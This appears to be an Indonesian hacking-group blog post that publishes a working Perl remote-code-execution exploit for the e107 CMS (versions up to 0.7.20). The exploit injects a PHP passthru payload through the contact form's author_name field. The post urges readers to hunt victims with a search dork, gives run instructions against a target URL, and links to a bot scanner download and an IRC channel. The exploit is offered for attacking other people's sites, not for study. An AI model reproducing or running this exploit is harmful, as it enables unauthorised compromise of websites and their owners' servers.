e107 Remote Code Execution + Scanner

Hallo Semua, Kembali Lagi Dengan Mencari Target Shell. Banyak Yang Minta Target Di Channel, Tapi So Far It’s OK lah Yuk nyari target dengan e107 bug dork. Jangan lupa install perl di komputer anda / server anda / shell anda (PENTING). Berikut ini adalah Exploitnya, copy dan simpan di file bernama: “e107-binushacker.pl” # Exploit Title: e107 Code Exec

# Date: 05/22/10

# Author: McFly@e107.org

# Software Link: http://e107.org/edownload.php

# Version: e107 <= 0.7.20

# Tested on: Linux/Windows

#!/usr/bin/perl -w

#################################################

# e107 Code Exec // SploitAuthor: McFly@e107.org

#################################################

# These scrubs still haven't released an update!

# Here is a little bit of motivation for them to

# patch one of the most popular, and insecure of

# the PHP web apps available today.

#################################################

# DORK: inurl:e107_plugins

#################################################

use LWP::UserAgent;

my $path = $ARGV[0] or die("Gunakan Perintah: perl e107-binushacker.pl http://e107site/pathto/contact.php\n");

my $load = 'passthru(chr(105).chr(100))'; # Simple 'id' command. Put ur PHP payload here!

# Remove comment for proxy support

my $proxy = 'http://127.0.0.1:8118/';

$ENV{http_proxy} = $proxy ? $proxy: 0;

$ua = new LWP::UserAgent;

$ua->agent("Mozilla/5.0");

if ( $proxy )

{

print "[*] Using proxy $proxy \n";

$ua->env_proxy('1');

}

my $req = new HTTP::Request POST => $path;

$req->content_type('application/x-www-form-urlencoded');

$req->content("send-contactus=1&author_name=%5Bphp%5D$load%3Bdie%28%29%3B%5B%2Fphp%5D");

my $res = $ua->request($req);

my $data = $res->as_string;

if ( $data =~ /

"']main_section['"]>(.*)/ )

{

$data = $1;

print "$data\n";

}

else

{

print "$data\n";

}

Setelah code tersebut dibuat, maka jalankan di directory active run perl shell / command prompt anda dengan dengan perintah: perl e107-binushacker.pl http://www.targetanda.com/pathnya/contact.php

Adapun Cara Lain Manual Bisa Dilihat (Video) Berikut:

Lihat Videonya Disini: HERE

Download it: HERE

Cara Lebih Mudah Lagi Dengan Menjalankan BOT SCANNER: Silakan Kunjungi #BINUSHACKER di IRC.DAL.NET untuk lebih detailnya & Tanyakan Langsung Ke Staff Yang Sedang Online.

Source Instant Download Bot Scanner: http://www.shantykooroostvaarders.nl/includes/js/tabs/bnshckr/

Selamat menikmati & semoga berhasil

Tags: BinusHacker, e107, Remote Code Execution, Tools